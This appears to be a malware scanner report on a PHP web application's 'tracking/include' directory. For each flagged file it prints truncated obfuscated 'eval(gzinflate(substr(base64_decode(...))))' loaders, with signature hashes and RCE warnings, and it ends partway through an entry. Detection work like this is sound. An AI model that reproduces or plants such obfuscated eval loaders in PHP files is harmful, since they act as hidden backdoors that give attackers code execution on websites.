<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO19eX8bN87w393fr9+B0borKdHhI0drx0kcR2m866u20nY3yuoZSWN7mpFGnRn5yCbPZ38B8OYckhy323efdRtbmiFBEgQBEATAr//Uvv+/bBh6SdKaXkzHXhD6MX76+k+t5t39tL7+0yfGTqOz9MqL/U12/Ob4gJpiTfzMfGyYd4Mt8POJwLEf/TgJoskme9Rab60tUrEUHPycBin07iJNp8lmuz2MRn7rPIrOQ781jMZtr+1NveGF3/Sv09hLWlF83p62FdraJrg7Q53u3c5oHMBg/xqM2V+988APkw8Bq03j6Bd/mDIP38J/CXQtjeL6nMHuzNKLKE422c5kdMOOY/8ySlJWwyFfRfF16g8v6sz89mKWALpbSTSLh/4ZDN1vTfzUwB3+bLIDLx7OEvYyCiZpNEGAUTiIZwiLPhSAyU4FB+cM9pdg/It3Xmf874t...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/class.smtp.php

Size: 9.17 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 3
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO1de3fbNrL/P+fkO6Ba71ryypL82pvYtRvVVhrvsS2vrDTb0/ToUBQksaZILR92tNvcz35nBiAJkqBEO443ubF66kgkMAAGM78ZPAZ4/qy58b/MtA3fb/izYN6YT+fPnzU2H+7TeP7sD8au3HFwa3h8n12+uTw3LJt7bBO/Mz6DX6IGrMTnDyLHfuaeb7nOPttrbDd2y2RcSg4+V1YAtZsGwdzfbzZNd8QbE9ed2LxhurOm0TTmhjnlm/xD4Bl+w/UmzXkTmDWjtjRVcg/GuqR27dHMgsb+3ZqxvxsTi9v+tcWqc8/9nZsBM/At/OdD1QLXq61obDsMpq7n77O2M1qwS4/fuH7AqtjkW9f7EHBzWmPqr1ehD+xu+G7omXwMTecNhwcK7/Czz84Nzwx99qNrOYHrIEHXHnoh0qIvBWTyXSHIZRr7uzX73ZjUmPj31QQZj12zorGv3dAZcW+f/ehxJ2C9BlQz+De3bc6...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1de3fbNrL/P+fkO6Ba71ryypL82pvYtRvVVhrvsS2vrDTb0/ToUBQksaZILR92tNvcz35nBiAJkqBEO443ubF66kgkMAAGM78ZPAZ4/qy58b/MtA3fb/izYN6YT+fPnzU2H+7TeP7sD8au3HFwa3h8n12+uTw3LJt7bBO/Mz6DX6IGrMTnDyLHfuaeb7nOPttrbDd2y2RcSg4+V1YAtZsGwdzfbzZNd8QbE9ed2LxhurOm0TTmhjnlm/xD4Bl+w/UmzXkTmDWjtjRVcg/GuqR27dHMgsb+3ZqxvxsTi9v+tcWqc8/9nZsBM/At/OdD1QLXq61obDsMpq7n77O2M1qwS4/fuH7AqtjkW9f7EHBzWmPqr1ehD+xu+G7omXwMTecNhwcK7/Czz84Nzwx99qNrOYHrIEHXHnoh0qIvBWTyXSHIZRr7uzX73ZjUmPj31QQ...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1de3fbNrL/P+fkO6Ba71ryypL82pvYtRvVVhrvsS2vrDTb0/ToUBQksaZILR92tNvcz35nBiAJkqBEO443ubF66kgkMAAGM78ZPAZ4/qy58b/MtA3fb/izYN6YT+fPnzU2H+7TeP7sD8au3HFwa3h8n12+uTw3LJt7bBO/Mz6DX6IGrMTnDyLHfuaeb7nOPttrbDd2y2RcSg4+V1YAtZsGwdzfbzZNd8QbE9ed2LxhurOm0TTmhjnlm/xD4Bl+w/UmzXkTmDWjtjRVcg/GuqR27dHMgsb+3ZqxvxsTi9v+tcWqc8/9nZsBM/At/OdD1QLXq61obDsMpq7n77O2M1qwS4/fuH7AqtjkW9f7EHBzWmPqr1ehD+xu+G7omXwMTecNhwcK7/Czz84Nzwx99qNrOYHrIEHXHnoh0qIvBWTyXSHIZRr7uzX73ZjUmPj31QQ...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

Sign ee1cb326 Line: 3 Dangerous

Malware Signature (hash: ee1cb326)

<?php 9WZW

/custdata01/kings/public_html/tracking/include/css.php

Size: 6.08 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO0da3PbNvJzM5P/gDJuRV0kWnLq5CJbTlOnN5OZPG6SdO56bkYDkZCEmCJ4JGjF7fm/3y5AUnxKpGTn2s6h01YkgX1hsS+C8P17c1dMqUsOphF3nYkXLacs6JED13ZP7t87kMKh1xMyJh5bkRdUsg98ycyOJ1adLjznM2LmRpLxmBgXF9lbHz8a3fv3CLRCTxJD75/NRLCk0jR+MhCoBvs1D0MmzYPJ+x/fv3/59k23O9JQvg9ZGHLhTUJJA2niCOY5fJaOLAy86EQhCybc6XzsdslvGgifZTv4LFhyBbTz8XRIvv2WFLFDn4AtQwQRQ1AMlR5fdCjgQd6caf/MXjD78rnjCO+5bQPV5vdVVPWGg8HgMfKxCe7VdCe4T7bBXdo7wf1rDq7DqauntCWYR9vI05B3InErbBHJueDefOLwkE5dlpk5Hv4EsN5Gcioiz3nFvcvwRdypGuM2XH4U2Asaslj7w504eroNix2...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0da3PbNvJzM5P/gDJuRV0kWnLq5CJbTlOnN5OZPG6SdO56bkYDkZCEmCJ4JGjF7fm/3y5AUnxKpGTn2s6h01YkgX1hsS+C8P17c1dMqUsOphF3nYkXLacs6JED13ZP7t87kMKh1xMyJh5bkRdUsg98ycyOJ1adLjznM2LmRpLxmBgXF9lbHz8a3fv3CLRCTxJD75/NRLCk0jR+MhCoBvs1D0MmzYPJ+x/fv3/59k23O9JQvg9ZGHLhTUJJA2niCOY5fJaOLAy86EQhCybc6XzsdslvGgifZTv4LFhyBbTz8XRIvv2WFLFDn4AtQwQRQ1AMlR5fdCjgQd6caf/MXjD78rnjCO+5bQPV5vdVVPWGg8HgMfKxCe7VdCe4T7bBXdo7wf1rDq7DqauntCWYR9vI05B3InErbBHJueDefOLwkE5dlpk5Hv4EsN5Gcioiz3n...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0da3PbNvJzM5P/gDJuRV0kWnLq5CJbTlOnN5OZPG6SdO56bkYDkZCEmCJ4JGjF7fm/3y5AUnxKpGTn2s6h01YkgX1hsS+C8P17c1dMqUsOphF3nYkXLacs6JED13ZP7t87kMKh1xMyJh5bkRdUsg98ycyOJ1adLjznM2LmRpLxmBgXF9lbHz8a3fv3CLRCTxJD75/NRLCk0jR+MhCoBvs1D0MmzYPJ+x/fv3/59k23O9JQvg9ZGHLhTUJJA2niCOY5fJaOLAy86EQhCybc6XzsdslvGgifZTv4LFhyBbTz8XRIvv2WFLFDn4AtQwQRQ1AMlR5fdCjgQd6caf/MXjD78rnjCO+5bQPV5vdVVPWGg8HgMfKxCe7VdCe4T7bBXdo7wf1rDq7DqauntCWYR9vI05B3InErbBHJueDefOLwkE5dlpk5Hv4EsN5Gcioiz3n...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/date_functions.php

Size: 795.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAKVV0W7aMBR9r8Q/WBUPIR1LywbTFBWpGkyt1MJUyEOfIi9xFkuJg2yHClX8+2wnJQ43fShECNA59x4f33vt9C56F1GGhUAzLEkgaYbeegpD6tmUfzMaISGxVD9JySJJC4ZimiTI6SeUC6mTvvQFiQoW6/+DtypVP03EmuZkJXG+QbcWOpwmBc+xdC6Dy4Fv5TVyrcQG/jCTb1Wg0ykw7PLTSo6pSmbkFa1CHfTAJOFbnDlK1Y7jRJac6fAa3Ot6ma+qkO30ppyei/7wYkO4pEQg12sVub9Ti1/7bSzvwOIOLO3AaAcmauzg54nItIiBmUOrw1AVUkheRhI5qC9V3UJZaHCrtqEUXEQZqsqtVQbI7v/v4PExfJnfPatlJ9eu+oy+u98m46+jsX8c9rRcrO/tOKcK9G5GAxA8u3uxQgF9vwwOS8KFHhbBem5owK3mv5aLmeJuTJE870Af71yF/JiMxz/h2Aqr7gbOKSs...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVV0W7aMBR9r8Q/WBUPIR1LywbTFBWpGkyt1MJUyEOfIi9xFkuJg2yHClX8+2wnJQ43fShECNA59x4f33vt9C56F1GGhUAzLEkgaYbeegpD6tmUfzMaISGxVD9JySJJC4ZimiTI6SeUC6mTvvQFiQoW6/+DtypVP03EmuZkJXG+QbcWOpwmBc+xdC6Dy4Fv5TVyrcQG/jCTb1Wg0ykw7PLTSo6pSmbkFa1CHfTAJOFbnDlK1Y7jRJac6fAa3Ot6ma+qkO30ppyei/7wYkO4pEQg12sVub9Ti1/7bSzvwOIOLO3AaAcmauzg54nItIiBmUOrw1AVUkheRhI5qC9V3UJZaHCrtqEUXEQZqsqtVQbI7v/v4PExfJnfPatlJ9eu+oy+u98m46+jsX8c9rRcrO/tOKcK9G5GAxA8u3uxQgF9vwwOS8KFHhbBem5owK3mv5a...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAKVV0W7aMBR9r8Q/WBUPIR1LywbTFBWpGkyt1MJUyEOfIi9xFkuJg2yHClX8+2wnJQ43fShECNA59x4f33vt9C56F1GGhUAzLEkgaYbeegpD6tmUfzMaISGxVD9JySJJC4ZimiTI6SeUC6mTvvQFiQoW6/+DtypVP03EmuZkJXG+QbcWOpwmBc+xdC6Dy4Fv5TVyrcQG/jCTb1Wg0ykw7PLTSo6pSmbkFa1CHfTAJOFbnDlK1Y7jRJac6fAa3Ot6ma+qkO30ppyei/7wYkO4pEQg12sVub9Ti1/7bSzvwOIOLO3AaAcmauzg54nItIiBmUOrw1AVUkheRhI5qC9V3UJZaHCrtqEUXEQZqsqtVQbI7v/v4PExfJnfPatlJ9eu+oy+u98m46+jsX8c9rRcrO/tOKcK9G5GAxA8u3uxQgF9vwwOS8KFHhbBem5owK3mv5a...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/db.client.php

Size: 2.67 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO1ae2/bNhD/2wHyHTjBQKVGsRdvwIBkTpHG7pqhW4omxdAVgUJLdMxVD1eikrpFvvuOpB6URNly0gHbULdJa/JePN7jp7N3d3Z3YvIxpTFxotAlZkywv8RsYXo0DnFATMd5cfZq6jiWNTCG3mzgRmFIXEajcLBcLA3raBdEDJ8+3d1BT9EEMzzDCUFuFCxxSEmCXB8nCSKhi5dJ6mNGwxtlNyBsEXnJgHMPd3ck8alPScjQFy65t4zpLWYE9R1vdlroPpJ76cynLpqnoVhEjgPWJSxOXWZanL/X4z99tqDJ/nFFABqjyfPy7eHhDWHlW5Mfq3cPP/BXHK4Hp/uFMDgOt40b3BMWN2zgciSN2ffAHYodwyFbEJR89FHC4EgBEA2EfXxpjIyE+KAeFM3jKMg1GUc5O50jkyYJYVLwe0NSONQzrqxMjSCUAgcgEd0tSEwQ9UD8Mynpvl2cuJVVB3klpUbucLiMyRIDWct...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1ae2/bNhD/2wHyHTjBQKVGsRdvwIBkTpHG7pqhW4omxdAVgUJLdMxVD1eikrpFvvuOpB6URNly0gHbULdJa/JePN7jp7N3d3Z3YvIxpTFxotAlZkywv8RsYXo0DnFATMd5cfZq6jiWNTCG3mzgRmFIXEajcLBcLA3raBdEDJ8+3d1BT9EEMzzDCUFuFCxxSEmCXB8nCSKhi5dJ6mNGwxtlNyBsEXnJgHMPd3ck8alPScjQFy65t4zpLWYE9R1vdlroPpJ76cynLpqnoVhEjgPWJSxOXWZanL/X4z99tqDJ/nFFABqjyfPy7eHhDWHlW5Mfq3cPP/BXHK4Hp/uFMDgOt40b3BMWN2zgciSN2ffAHYodwyFbEJR89FHC4EgBEA2EfXxpjIyE+KAeFM3jKMg1GUc5O50jkyYJYVLwe0NSONQzrqxMjSCUAgcgEd0tSEw...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO1ae2/bNhD/2wHyHTjBQKVGsRdvwIBkTpHG7pqhW4omxdAVgUJLdMxVD1eikrpFvvuOpB6URNly0gHbULdJa/JePN7jp7N3d3Z3YvIxpTFxotAlZkywv8RsYXo0DnFATMd5cfZq6jiWNTCG3mzgRmFIXEajcLBcLA3raBdEDJ8+3d1BT9EEMzzDCUFuFCxxSEmCXB8nCSKhi5dJ6mNGwxtlNyBsEXnJgHMPd3ck8alPScjQFy65t4zpLWYE9R1vdlroPpJ76cynLpqnoVhEjgPWJSxOXWZanL/X4z99tqDJ/nFFABqjyfPy7eHhDWHlW5Mfq3cPP/BXHK4Hp/uFMDgOt40b3BMWN2zgciSN2ffAHYodwyFbEJR89FHC4EgBEA2EfXxpjIyE+KAeFM3jKMg1GUc5O50jkyYJYVLwe0NSONQzrqxMjSCUAgcgEd0tSEw...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/db.company.php

Size: 2.23 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAN1YW2/bNhR+doD8B84warlxndSxX5I5Q5eka4FtLdoOezAClZbomKlEqRJV11jz33d4kUTdLDvpMKBGYlni+XhuHw+PeHhweBCRzwmNiB0wh1gRwV6I+cpyacSwTyzbfvn692vbHgxG3WN3MXICxojDacBG4SrsDs4PYYrjp08PD9BTdIU5XuCYICfwQ8woiZHj4ThGhDk4jBMPc8pujVGf8FXgxiOBPj48UMKXcniD/hFTd8KIfsGcoJ7tLi4z5edqLFl41EHLhMmHyLbBvJhHicOtgcB3OuK/x1c0fnZRmADN0NWv+e3Z2S3h+a0l/Orcwz/8Se864N5vhOe2j+Sz4xor5ExayjTj+JivCIo/eyjm4JFPGB9J88SjGerGxAPtoGcZBX6uqHueTxBGJMQRQQ0TRQRizGGuOo+fXWi0JRQOjFnJV+IkvGXWZxdazMqhhsJUaEm4s3rhedbbqzdnZy+vP1y+sl+8f//...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN1YW2/bNhR+doD8B84warlxndSxX5I5Q5eka4FtLdoOezAClZbomKlEqRJV11jz33d4kUTdLDvpMKBGYlni+XhuHw+PeHhweBCRzwmNiB0wh1gRwV6I+cpyacSwTyzbfvn692vbHgxG3WN3MXICxojDacBG4SrsDs4PYYrjp08PD9BTdIU5XuCYICfwQ8woiZHj4ThGhDk4jBMPc8pujVGf8FXgxiOBPj48UMKXcniD/hFTd8KIfsGcoJ7tLi4z5edqLFl41EHLhMmHyLbBvJhHicOtgcB3OuK/x1c0fnZRmADN0NWv+e3Z2S3h+a0l/Orcwz/8Se864N5vhOe2j+Sz4xor5ExayjTj+JivCIo/eyjm4JFPGB9J88SjGerGxAPtoGcZBX6uqHueTxBGJMQRQQ0TRQRizGGuOo+fXWi0JRQOjFnJV+IkvGXWZxdazMq...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAN1YW2/bNhR+doD8B84warlxndSxX5I5Q5eka4FtLdoOezAClZbomKlEqRJV11jz33d4kUTdLDvpMKBGYlni+XhuHw+PeHhweBCRzwmNiB0wh1gRwV6I+cpyacSwTyzbfvn692vbHgxG3WN3MXICxojDacBG4SrsDs4PYYrjp08PD9BTdIU5XuCYICfwQ8woiZHj4ThGhDk4jBMPc8pujVGf8FXgxiOBPj48UMKXcniD/hFTd8KIfsGcoJ7tLi4z5edqLFl41EHLhMmHyLbBvJhHicOtgcB3OuK/x1c0fnZRmADN0NWv+e3Z2S3h+a0l/Orcwz/8Se864N5vhOe2j+Sz4xor5ExayjTj+JivCIo/eyjm4JFPGB9J88SjGerGxAPtoGcZBX6uqHueTxBGJMQRQQ0TRQRizGGuOo+fXWi0JRQOjFnJV+IkvGXWZxdazMq...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/db.connection.php

Size: 643.00 B Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAE2Rb2+bMBDGXxOJ73BDfQFRBu/TNVK6MK3S2kaBvUbGXIIralOfrYCmfvcdsD+VMD5bzz3+3V24ClfZeh2uYA0H4UQtCOGr0RqlU0aD7AQRXFslW1AEL54cCLha0fdoQVjjdQPHw3M6OWThatEf7j9Y4OBQNzSp4FfI7wW9rzslgZxwvJ29XoQXdP/T4mQSB8G0suxsLBBKb5UbwaIgo2kDVwSlZecbBNciSKPP6gJn1SEY3Y3QosV0MrD45pXFmDO7Xrg2bpTV4hXjqvr28COvqiRJo2zJT/u2j5Lbv287Oy4g84lRJJs45CZwA0gR1+bm0kz9wuQMIhxIoaFG8ITNtJOviQkmJUmrekczFWM5bzVovE4OcfQ60lu3bQ25uwhSuDncV9+fi5LD6LapJ+B/90/7x3wzRz+L/LREx31RbHgmVozx7B+w63a7L8tTdcxPxUNR5k8l3O3AWY+zIlkKnWt7Z2wn25iT8kF...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAE2Rb2+bMBDGXxOJ73BDfQFRBu/TNVK6MK3S2kaBvUbGXIIralOfrYCmfvcdsD+VMD5bzz3+3V24ClfZeh2uYA0H4UQtCOGr0RqlU0aD7AQRXFslW1AEL54cCLha0fdoQVjjdQPHw3M6OWThatEf7j9Y4OBQNzSp4FfI7wW9rzslgZxwvJ29XoQXdP/T4mQSB8G0suxsLBBKb5UbwaIgo2kDVwSlZecbBNciSKPP6gJn1SEY3Y3QosV0MrD45pXFmDO7Xrg2bpTV4hXjqvr28COvqiRJo2zJT/u2j5Lbv287Oy4g84lRJJs45CZwA0gR1+bm0kz9wuQMIhxIoaFG8ITNtJOviQkmJUmrekczFWM5bzVovE4OcfQ60lu3bQ25uwhSuDncV9+fi5LD6LapJ+B/90/7x3wzRz+L/LREx31RbHgmVozx7B+w63a7L8tTdcx...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAE2Rb2+bMBDGXxOJ73BDfQFRBu/TNVK6MK3S2kaBvUbGXIIralOfrYCmfvcdsD+VMD5bzz3+3V24ClfZeh2uYA0H4UQtCOGr0RqlU0aD7AQRXFslW1AEL54cCLha0fdoQVjjdQPHw3M6OWThatEf7j9Y4OBQNzSp4FfI7wW9rzslgZxwvJ29XoQXdP/T4mQSB8G0suxsLBBKb5UbwaIgo2kDVwSlZecbBNciSKPP6gJn1SEY3Y3QosV0MrD45pXFmDO7Xrg2bpTV4hXjqvr28COvqiRJo2zJT/u2j5Lbv287Oy4g84lRJJs45CZwA0gR1+bm0kz9wuQMIhxIoaFG8ITNtJOviQkmJUmrekczFWM5bzVovE4OcfQ60lu3bQ25uwhSuDncV9+fi5LD6LapJ+B/90/7x3wzRz+L/LREx31RbHgmVozx7B+w63a7L8tTdcx...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/db.invoice.php

Size: 2.49 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEANUYaW/TSPRzKvU/PHlT4lQ5KNJ+SdVWpQ1LV0C7tGgFVWRN7Uk6i48wtgsp9L/vm8t30nQL7K6B4Jl3zrvHmxubG5x+ShmnThS61OaU+HOSXNse4yEJqO04L05ejR2n2x1YQ+9q4EZhSN2EReFgfj23urubyGK4vb25AdtwTBJyRWIKLLyJmEtjcH0Sx0BDl8zj1CcJC2c5MKDJdeTFA0E73NxQuCcKCl8F49acsxuSUGg73tVRJnpXwdIrn7kwTUO5CY6DysUJT93E7gr6Vkv8ayfXLO7vlxjAHhw/z5ej0Ywm+dIWp2rdCSGAj5YTJ6h+QRwLE8rnER6K/pFSvrDbn8R/PWjPCSdBLFUA/bQ/0kWMUgnnZGErqxnYL3CVMt8DApzO0Egc6Jc5p3EspEwjXBL3GiRTiiJzQoRJkK0lAomlINjbh/YN8VNa0kE8bAo2ix20EnrCFsjdGk6m7+UENe4MR52BWA46w85...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEANUYaW/TSPRzKvU/PHlT4lQ5KNJ+SdVWpQ1LV0C7tGgFVWRN7Uk6i48wtgsp9L/vm8t30nQL7K6B4Jl3zrvHmxubG5x+ShmnThS61OaU+HOSXNse4yEJqO04L05ejR2n2x1YQ+9q4EZhSN2EReFgfj23urubyGK4vb25AdtwTBJyRWIKLLyJmEtjcH0Sx0BDl8zj1CcJC2c5MKDJdeTFA0E73NxQuCcKCl8F49acsxuSUGg73tVRJnpXwdIrn7kwTUO5CY6DysUJT93E7gr6Vkv8ayfXLO7vlxjAHhw/z5ej0Ywm+dIWp2rdCSGAj5YTJ6h+QRwLE8rnER6K/pFSvrDbn8R/PWjPCSdBLFUA/bQ/0kWMUgnnZGErqxnYL3CVMt8DApzO0Egc6Jc5p3EspEwjXBL3GiRTiiJzQoRJkK0lAomlINjbh/YN8VNa0kE8bAo...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEANUYaW/TSPRzKvU/PHlT4lQ5KNJ+SdVWpQ1LV0C7tGgFVWRN7Uk6i48wtgsp9L/vm8t30nQL7K6B4Jl3zrvHmxubG5x+ShmnThS61OaU+HOSXNse4yEJqO04L05ejR2n2x1YQ+9q4EZhSN2EReFgfj23urubyGK4vb25AdtwTBJyRWIKLLyJmEtjcH0Sx0BDl8zj1CcJC2c5MKDJdeTFA0E73NxQuCcKCl8F49acsxuSUGg73tVRJnpXwdIrn7kwTUO5CY6DysUJT93E7gr6Vkv8ayfXLO7vlxjAHhw/z5ej0Ywm+dIWp2rdCSGAj5YTJ6h+QRwLE8rnER6K/pFSvrDbn8R/PWjPCSdBLFUA/bQ/0kWMUgnnZGErqxnYL3CVMt8DApzO0Egc6Jc5p3EspEwjXBL3GiRTiiJzQoRJkK0lAomlINjbh/YN8VNa0kE8bAo...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/db.php

Size: 40.74 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAOy9a3vbNtIw/Ln3dT3/AeHjraSWPva061RO3dhpvXdqZ22l++5688iyRNvcSKJKUnG83fz3F4MTcSRBSXbcltpNLZHAYDAYDGYGA8z/+Z//8z/D8SDL0Gk0GPdfHZyg6H0eTUcZgu+//p//Qfgzm1+O4yG6mk+HeZxM0S/zJI/aa+8G43kUorXZIB1MojxK+/ndLEJdqLq7+2r/dP+n/lnvFHU4HPjEV20UZ/3pfDxmEDpqAfikUT5Ppyg4fv3yZfC0ePeh+MqK4Lajab67W4pSh4H4YO9OlA0HM16586vRRpan8SzDVLqJsjb+0U+j2XgwjNqDNB3ctVv/+lcrRMG/tgL475T8N4X/tvB/WgF59357EHRCRCsE8Pxf/9pqkT9T+icl5f7Vou8C+vCfLVyJ4SV1YnPTPipRetdey34ZQx82N2kp+FzF46g/m+f9YTLFg5tn7WBjkxTvj5PrDfwvCIOzv71EB4ffv/5...

Exploit execution Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOy9a3vbNtIw/Ln3dT3/AeHjraSWPva061RO3dhpvXdqZ22l++5688iyRNvcSKJKUnG83fz3F4MTcSRBSXbcltpNLZHAYDAYDGYGA8z/+Z//8z/D8SDL0Gk0GPdfHZyg6H0eTUcZgu+//p//Qfgzm1+O4yG6mk+HeZxM0S/zJI/aa+8G43kUorXZIB1MojxK+/ndLEJdqLq7+2r/dP+n/lnvFHU4HPjEV20UZ/3pfDxmEDpqAfikUT5Ppyg4fv3yZfC0ePeh+MqK4Lajab67W4pSh4H4YO9OlA0HM16586vRRpan8SzDVLqJsjb+0U+j2XgwjNqDNB3ctVv/+lcrRMG/tgL475T8N4X/tvB/WgF59357EHRCRCsE8Pxf/9pqkT9T+icl5f7Vou8C+vCfLVyJ4SV1YnPTPipRetdey34ZQx82N2kp+FzF46g/m+f9YTL...

Function eval Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAOy9a3vbNtIw/Ln3dT3/AeHjraSWPva061RO3dhpvXdqZ22l++5688iyRNvcSKJKUnG83fz3F4MTcSRBSXbcltpNLZHAYDAYDGYGA8z/+Z//8z/D8SDL0Gk0GPdfHZyg6H0eTUcZgu+//p//Qfgzm1+O4yG6mk+HeZxM0S/zJI/aa+8G43kUorXZIB1MojxK+/ndLEJdqLq7+2r/dP+n/lnvFHU4HPjEV20UZ/3pfDxmEDpqAfikUT5Ppyg4fv3yZfC0ePeh+MqK4Lajab67W4pSh4H4YO9OlA0HM16586vRRpan8SzDVLqJsjb+0U+j2XgwjNqDNB3ctVv/+lcrRMG/tgL475T8N4X/tvB/WgF59357EHRCRCsE8Pxf/9pqkT9T+icl5f7Vou8C+vCfLVyJ4SV1YnPTPipRetdey34ZQx82N2kp+FzF46g/m+f9YTL...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/include/dialer_actions.php

Size: 9.13 kB Created: 2016-02-18 21:31:59 Modified: 2017-03-25 00:03:50 Warns: 2 Dangers: 3
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

